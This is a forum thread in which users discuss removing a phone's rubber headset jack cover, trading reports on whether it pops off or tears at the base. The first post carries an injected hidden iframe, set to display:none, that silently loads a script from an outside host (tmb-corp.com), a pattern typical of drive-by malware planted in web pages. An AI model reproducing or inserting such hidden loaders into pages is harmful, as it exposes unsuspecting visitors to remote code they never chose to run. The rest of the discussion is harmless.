+ Reply to Thread

Headset cover -> Removal?

Has anyone pulled this piece of rubber off? I want to remove mine, but want to make sure it just 'pops' off, and will not rip. It is hard to tell if it goes under the plastic or stops at the edge.

Thx<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Good question, I also want to do this. The first thing people look at is the rubber headset jack cover that will not properly stay in the jack. I use the headset all the time and figure there's no need to use the dumb thing.

HaHa - I have the reverse problem. Mine stays in too well- many time I have to find a paperclip or something to dig it out.

I doubt it is really needed - I have had startacs for years without covers and never had a problem.

I got frustrated with it and ripped it off. It does seem to tear at the base (the very bottom) but it doesn't look bad...it won't go back on though if you rip it off.

Originally posted by vansman
    HaHa - I have the reverse problem. Mine stays in too well- many time I have to find a paperclip or something to dig it out.
    Ditto. Thankfully, I have relatively long nails.